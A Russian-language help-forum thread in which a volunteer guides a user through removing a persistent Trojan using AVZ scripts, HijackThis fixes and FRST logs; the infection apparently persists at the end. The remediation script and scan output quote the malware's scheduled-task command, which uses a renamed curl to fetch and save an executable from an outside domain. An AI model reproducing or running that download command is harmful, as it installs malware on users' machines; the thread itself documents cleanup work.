Trojan.Multi.GenAutorunTask.c в системной памяти

[Sergey_IT]

Здравствуйте, Kaspersky Endpoint Security 11 при каждом запуске системы находит вирус Trojan.multi.genautoruntask.c в системной памяти, при попытке устранить угрозу Касперский пишет что 1 объект не обработан. Лог с утилиты AVZ прилагаю, заранее спасибо

avz_log.txt

[Sandor]

Здравствуйте!

 

Лог не тот. Прочтите и выполните Порядок оформления запроса о помощи

[Sergey_IT]

CollectionLog-2021.11.19-10.30.zip

[Sandor]

Файл Hosts правили самостоятельно?

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFileF('c:\users\администратор\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\Windows\Fonts\Mysql\svchost.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe"', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '32');
 DeleteFileMask('c:\users\администратор\appdata\roaming\curl', '*', true);
 DeleteSchedulerTask('curl.quarantined');
 DeleteSchedulerTask('curls.quarantined');
 DeleteDirectory('c:\users\администратор\appdata\roaming\curl');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O22 - Task: (damaged) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\Windows\system32\CompatTelRunner.exe (Microsoft) (user missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} - \Update S1-8-22 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1845DCCB-BDFF-4505-AA9C-8832A71E5272} - \Opera scheduled Autoupdate 1513753951 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} - \One Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3A3CA751-82FC-408C-8BC4-146686D1A61C} - \ZaxarGameBrowserz (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} - \nvfontcache (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} - \curl (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DE96F17-EC17-45E4-8F73-0A669AB3620D} - \GoogleUpdate_Task_Core (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} - \curls (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B9B6770E-F99B-4FA0-BD0D-2C0F0FD70E45} - \GoogleUpdate_Task_Machine (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} - \DuckGo Task (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} - \OnePlus Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD (empty)
O22 - Task: curl.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task: curls.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl.exe (file missing)

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

[Sergey_IT]

Результат загрузки:

Sergey_IT, Ваш карантин отправлен, спасибо!

Имя карантин-а(ов) сообщите в теме:
2021.11.19_quarantine_de95fbc0c2ec83b5050ec09d90fef25f.zip

[Sandor]

Продолжайте.

[Sergey_IT]

CollectionLog-2021.11.19-11.26.zip

[Sandor]

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

[Sergey_IT]

FRST.txt Addition.txt

[Sandor]

1 час назад, Sandor сказал:

Файл Hosts правили самостоятельно?

Не ответили.

 

Сообщите также самостоятельно ли ставили программу?

Цитата

Chromium-Gost

 

[Sergey_IT]

Hosts правил, необходимо было его отредактировать для работы в тот момент когда рабочая станция находилась раннее в домене.

Chromium-Gost так же устанавливал сам.

[Sandor]

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  SystemRestore: On
  CreateRestorePoint:
  HKU\S-1-5-21-3800301354-2339470603-2501348306-1000\...\MountPoints2: {7152c183-07d3-11e7-8ee1-806e6f6e6963} - D:\ShelExec.exe open.htm
  GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
  GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
  Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\Users\OtepovaNV\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\Users\Администратор\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  U3 aswbdisk; отсутствует ImagePath
  2021-11-18 15:08 - 2020-03-04 10:23 - 000000000 __SHD C:\AdwCleaner
  AlternateDataStreams: C:\ProgramData\TEMP:E965A533 [129]
  FirewallRules: [{CABC3625-F663-4B5E-A80F-340729CFD55B}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
  FirewallRules: [{96A891F5-CBCF-48A7-8410-3C9DFF98F47E}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
  FirewallRules: [{47C59CAE-394B-4755-A04A-F2928CD7DBFA}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
  FirewallRules: [{DBB8EFF7-66D7-446C-9215-572DE771C34F}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
  FirewallRules: [{125E7D45-4FFE-4A8E-8D8D-30E4A9402992}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
  FirewallRules: [{E4C7ED3D-8220-4B12-A4A4-110A30FC0324}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
  EmptyTemp:
  Reboot:
  End::

   

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

[Sergey_IT]

Fixlog.txt

[Sandor]

Что сейчас с проблемой?

[Sergey_IT]

Вирус не исчез